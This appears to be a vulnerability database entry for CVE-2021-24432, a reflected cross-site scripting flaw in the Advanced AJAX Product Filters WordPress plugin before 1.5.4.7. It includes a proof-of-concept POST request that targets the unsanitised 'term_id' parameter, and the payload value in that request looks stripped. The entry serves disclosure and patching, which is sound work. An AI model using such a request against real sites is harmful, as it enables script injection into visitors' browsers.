Lucene search
Dc11WPVDB-ID:B92EC5F7-D6A8-476F-A01E-21001A558914HistoryJun 09, 2021 - 12:00 a.m.
Advanced AJAX Product Filters < 1.5.4.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-06-0900:00:00
dc11
wpscan.com
5
0.0005 Low
EPSS
Percentile
17.0%
The br_aapf_get_child AJAX action of the plugin, available to both unauthenticated and authenticated users does not sanitise the ‘term_id’ POST parameter before outputting it in the page, leading to reflected Cross-Site Scripting issue.
PoC
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Connection: keep-alive Upgrade-Insecure-Requests: 1 Cookie: [unauthenticated/any authenticated user] action=br_aapf_get_child&type;=any-string&term;_id=“”
| CPE | Name | Operator | Version |
|---|---|---|---|
| woocommerce-ajax-filters | lt | 1.5.4.7 |
Related
wpexploit
wpexploit
patchstack
patchstack
cve
cve
CVE-2021-24432
2024-01-16 16:15:08
cvelist
cvelist
prion
prion
Cross site scripting
2024-01-16 16:15:00
nvd
nvd
CVE-2021-24432
2024-01-16 16:15:08